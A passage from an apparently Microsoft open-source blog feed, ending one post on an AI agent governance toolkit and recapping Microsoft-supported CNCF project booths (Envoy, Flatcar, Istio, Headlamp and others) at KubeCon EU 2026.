&lt;H1&gt;Important Notes&lt;/H1&gt;
&lt;P&gt;&lt;EM&gt;The policy files, workflow configurations, and code samples in this post are illustrative examples. Your organization's governance requirements may differ. Review and customize all configurations before deploying to production. The Agent Governance Toolkit is designed to help organizations implement governance controls for AI agents; it does not guarantee compliance with any specific regulatory framework. Always consult your organization's security and legal teams when defining governance policies.&lt;/EM&gt;&lt;/P&gt;
&lt;H1&gt;What Comes Next&lt;/H1&gt;
&lt;P&gt;Pre-runtime governance is one piece of the puzzle. Combined with the runtime governance capabilities covered in part one of this series (policy engines, zero-trust identity, execution sandboxing, audit logging), it provides coverage across the full lifecycle.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;The project continues to grow.&lt;/STRONG&gt; Since the initial release, we’ve added a multi-stage policy pipeline (pre_input, pre_tool, post_tool, pre_output stages), approval workflows with human-in-the-loop gates, DLP attribute ratchets for monotonic session state, and OpenTelemetry instrumentation for governance operations. Over 45 step-by-step tutorials are available in the documentation.&lt;/P&gt;
&lt;P&gt;Everything described in this post is available today in the public GitHub repository. The full source, documentation, tutorials, and examples are at &lt;A class="lia-external-url" href="http://aka.ms/agent-governance-toolkit" target="_blank"&gt;aka.ms/agent-governance-toolkit&lt;/A&gt;, open source under the MIT license. We welcome contributions, feedback, and issue reports from the community.&lt;/P&gt;</description>
      <pubDate>Fri, 01 May 2026 16:48:09 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/shift-left-governance-for-ai-agents-how-the-agent-governance/ba-p/4516481</guid>
      <dc:creator>mosiddi</dc:creator>
      <dc:date>2026-05-01T16:48:09Z</dc:date>
    </item>
    <item>
      <title>Project Pavilion Presence at KubeCon EU 2026</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/project-pavilion-presence-at-kubecon-eu-2026/ba-p/4515518</link>
      <description>&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;KubeCon + CloudNativeCon Europe 2026 took place from 23 to 26 March at RAI Amsterdam, and it was a strong one. The themes running through the week reflected where the cloud native community is right now: AI moving from experimentation into production, platform engineering continuing to mature, and security and sovereignty top of mind for organizations across Europe. Microsoft was there throughout, and once again supported a range of open source projects in the Project Pavilion.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The Project Pavilion is a dedicated, vendor-neutral space on the show floor reserved for CNCF projects. It is where the work gets talked about honestly. Maintainers and contributors meet directly with end users, share what they are building, get real feedback on what is and is not working, and have the kinds of technical conversations that are hard to have anywhere else. For open source communities, it is one of the most valuable parts of the event.&lt;/SPAN&gt; &lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H2&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Why Our Presence Matters&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/H2&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Microsoft's products and services are built on and alongside many of the technologies represented in the pavilion, and the health of these communities matters to us directly. Showing up means our teams hear firsthand what is working, what is missing, and where these projects need to go next. It also means we get to contribute as community members, not just as a company name on a sponsor board. That distinction matters to us, and to the communities we are part of.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H2 aria-level="2"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Microsoft-Supported Pavilion Projects&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/H2&gt;
&lt;H3&gt;Confidential Containers&lt;/H3&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Representative: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="none"&gt;Jeremi Piotrowski&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/confidential-containers/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Confidential&lt;/SPAN&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt; Containers&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; booth gave attendees a chance to learn more about the project and its approach to protecting workloads using hardware-based trusted execution environments. Jeremi was on hand throughout the kiosk hours, fielding questions from interested users and developers exploring confidential computing in Kubernetes environments. Conversations touched on use cases around data privacy, regulated workloads, and the role Confidential Containers plays in the broader cloud-native security landscape.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Heading 3 Char"&gt;Drasi&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Representative: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="none"&gt;Daniel Gerlag and Nandita Valsan&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="none"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/drasi/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Drasi&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="none"&gt; team &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;had a busy time in the pavilion, engaging around 40 attendees across two kiosk shifts in focused technical conversations. Most visitors were developers and platform engineers curious about change-driven architectures and real-time data processing. There was strong positive feedback on the newly introduced Drasi Server modes and embeddable library, which complement Drasi for Kubernetes. The team came away with useful validation of current design decisions and good input for the roadmap ahead.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Heading 3 Char"&gt;Envoy&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Representative: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="none"&gt;Mikhail Krinkin&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/envoy/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Envoy&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; booth was staffed for the full duration of KubeCon EU by maintainers from Microsoft, Google, Isovalent, and Tetrate, reflecting the broad and healthy contributor base behind the project. The biggest topic at the booth was migration from ingress-nginx to Gateway API implementations. The archival of ingress-nginx pushed a lot of users into making changes they were not quite ready for, and questions ranged from technical specifics like HTTP default differences between Envoy and Nginx, to more foundational questions about what Envoy and Gateway API actually are. The team had anticipated this and invested in the &lt;/SPAN&gt;&lt;A href="https://github.com/kubernetes-sigs/ingress2gateway" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;ingress2gateway project&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; to give users a clear migration path. Extensibility was another frequent conversation topic, with dynamic modules increasingly becoming the go-to answer for user-specific requirements. Starting with the 1.38 release of Envoy, dynamic modules will have a backward compatible ABI, a sign of real production readiness for that feature.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Heading 3 Char"&gt;Flatcar&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN style="color: rgb(30, 30, 30);" data-contrast="none"&gt;Representative: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN style="color: rgb(30, 30, 30);" data-contrast="auto"&gt;Thilo Fromm and Mathieu Tortuyaux&lt;/SPAN&gt;&lt;SPAN style="color: rgb(30, 30, 30);" data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/flatcar-container-linux/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Flatcar&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; booth had great energy, with maintainers from Microsoft, STACKIT, and CloudBase joining for conversations throughout the pavilion hours. Operational sovereignty came up again and again as a theme, with users and consulting partners sharing how they are building their Kubernetes offerings on Flatcar because of how reliable and secure it is.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;There were a lot of meaningful conversations. Lambda.ai currently runs Flatcar on their control plane and is looking at extending it to worker and customer clusters, with interest in contributing to the project. ReeVo has built their hosted Kubernetes distro on Flatcar across multi-cloud and bare metal environments and is planning to move hundreds of customer clusters over soon. Users from ClearScore, Avassa, Recorded Future, and several other organizations also stopped by with positive feedback on the project's robustness and security. STACKIT uses Flatcar as the default OS for their hosted Kubernetes offering and sponsors a full-time maintainer for the project. The team also connected with TAG Infrastructure to talk through Flatcar's CNCF graduation progress.&lt;/SPAN&gt; &lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Heading 3 Char"&gt;Headlamp&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;SPAN data-contrast="none"&gt;&lt;STRONG&gt;Representatives:&lt;/STRONG&gt; &lt;/SPAN&gt;&lt;SPAN data-contrast="none"&gt;René Dudfield and Santhosh Nagaraj S&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/headlamp/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Headlamp&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; booth was a busy one, with users, contributors, and partner projects all stopping by throughout the pavilion hours. Conversations covered real-world deployments, federation challenges, multi-tenant namespace visibility, and feature requests like multi-CR data aggregation. There was notable interest from consultancies deploying Headlamp across hundreds of customer clusters, as well as from companies already running it at cloud scale. Several CNCF projects expressed interest in building UIs for their own projects inside Headlamp, with a few even getting started right there at the conference. The team also heard from users getting budget approved to migrate from the deprecated Kubernetes Dashboard, which is a good sign for the project's growing momentum. Demand for air-gapped AI agent support and deeper Azure and AKS integrations for internal developer platforms came up as clear areas to watch.&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Heading 3 Char"&gt;Hyperlight&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Representative: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="none"&gt;Ralph Squillace&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/hyperlight/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Hyperlight&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; booth ran as a half-day session on Tuesday, in line with the project's current Sandbox status, but the corner location in the project area made a real difference in visibility. Ralph was fielding questions from the moment the doors opened, with a steady stream of visitors right up until the shift ended. Live and recorded demos were central to the conversations, helping attendees quickly grasp what Hyperlight does and how it fits into their environments. One standout visit came from an engineer at SAP who spent nearly an hour at the booth, pushing the conversation from fundamentals and &lt;/SPAN&gt;&lt;A href="https://github.com/hyperlight-dev/hyperlight-wasm" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;embedding examples&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; all the way through to agentic protection scenarios in Kubernetes. That conversation continued beyond KubeCon and turned into a scheduled meeting to explore a proof of concept, a good example of the kind of follow-on engagement the pavilion can generate.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Heading 3 Char"&gt;Inspektor Gadget&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Representative: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="none"&gt;Michael Friese and Qasim Sarfraz&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/inspektor-gadget/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Inspektor Gadget&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; booth had a lot of great energy, drawing in contributors, new users, and people just discovering the project for the first time. There was genuine excitement around &lt;/SPAN&gt;&lt;A href="https://github.com/inspektor-gadget/ig-desktop" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Inspektor Gadget Desktop&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; and its visual troubleshooting experience for Kubernetes and Linux environments. The &lt;/SPAN&gt;&lt;A href="https://inspektor-gadget.io/blog/2026/03/inspektor-gadget-holmesgpt/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;integration with HolmesGPT&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;, which was also &lt;/SPAN&gt;&lt;A href="https://www.youtube.com/watch?v=Apha61UYfLY" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;featured in the keynote&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;, came up frequently and was one of the main talking points throughout the event. A theme that surfaced consistently in conversations with platform engineers was multi-tenancy, with teams looking for ways to safely give developers ad-hoc access to troubleshoot issues independently while keeping overall control at the platform level. It was a good set of conversations that reflected both the project's maturity and the growing demand for a flexible observability framework.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Heading 3 Char"&gt;Istio&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Representative:&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;STRONG&gt; &lt;/STRONG&gt;Mitch Connors, Mikhail Krinkin, Jackie Maertens and Mike Morris&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/istio/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Istio&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; booth had steady traffic throughout the conference, with a noticeable shift in who was stopping by. More visitors came from teams with existing sidecar-based production deployments looking for guidance on moving to &lt;/SPAN&gt;&lt;A href="https://istio.io/latest/docs/ambient/overview/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;ambient mode&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;, which is a change from previous years when ambient interest was mostly coming from greenfield users. The motivation to make the move was often tied to cost optimization and performance, with teams having read case studies and feeling more confident about the direction. That said, the increased interest also surfaced some real gaps, including requests for clearer migration guidance, more clarity around architectural differences like mTLS egress workflows, and better support for VM-based workloads. The team is planning to prioritize migration guidance over the coming months. The updated Istio Day format, with a half day of sessions at the Cloud Native Theater stage, also drew a strong crowd with standing room only throughout.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Heading 3 Char"&gt;Notary Project&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Representative: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Toddy Mladenov and Flora Taagen&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/notary-project/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Notary Project&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; kiosk drew a wide range of visitors, from people learning about container image signing for the first time to experienced engineers asking detailed questions about what is coming next on the roadmap. A major highlight of the week was the project's conference talk on per-layer dm-verity signing, which drew a packed room and over 660 online sign-ups, one of the stronger turnouts for a project-level session at the event. The talk walked through how the new capability moves container security beyond pull-time verification to continuous runtime protection, backed by dm-verity, which generated a lengthy Q&amp;amp;A and a lot of enthusiasm from the audience. The team also sees a real opportunity ahead as AI workloads push organizations to think harder about the integrity of models, datasets, and container images, and the interest at the booth reinforced that Notary Project is well positioned to play a big role in securing those workflows.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Heading 3 Char"&gt;ORAS&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Representative: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="auto"&gt;Toddy Mladenov&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/oras/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;ORAS&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; kiosk was staffed by maintainers from Microsoft, NVIDIA, and Red Hat, a good reflection of the healthy multi-vendor community the project has built. Attendees engaged with maintainers on ORAS use cases and adoption, with conversations ranging from how artifacts are tagged and packaged to how ORAS fits into broader multi-cloud workflows. One practical takeaway from maintainer conversations was around leveraging the &lt;/SPAN&gt;&lt;A href="https://github.com/oras-project/oras-go" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;ORAS SDK&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; more often as a substitute for CLI operations when working with container registries, which helps teams build simpler and more robust tooling.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Heading 3 Char"&gt;Radius&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;Representative: &lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN data-contrast="none"&gt;Sylvain Niles and Will Tsai&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The &lt;/SPAN&gt;&lt;A href="https://www.cncf.io/projects/radius/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Radius&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; booth, supported by the &lt;/SPAN&gt;&lt;A href="https://www.azureincubations.io/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Microsoft Azure Incubations&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; team, attracted a good mix of enterprise platform teams, prospective adopters, and fellow open source maintainers throughout the pavilion hours. There was strong interest in the extensible &lt;/SPAN&gt;&lt;A href="https://docs.radapp.io/guides/author-apps/custom-types/" target="_blank"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Radius Resource Types&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt; feature and how it helps teams abstract infrastructure complexity and move workloads across different environments. Conversations also surfaced useful feedback on where the project should focus next, including agent-driven infrastructure workflows and using the Radius application graph to improve observability and operational visibility for cloud-native applications.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H2 aria-level="2"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Conclusion&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134245418&amp;quot;:false,&amp;quot;134245529&amp;quot;:false,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559738&amp;quot;:160,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559740&amp;quot;:276}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H2&gt;
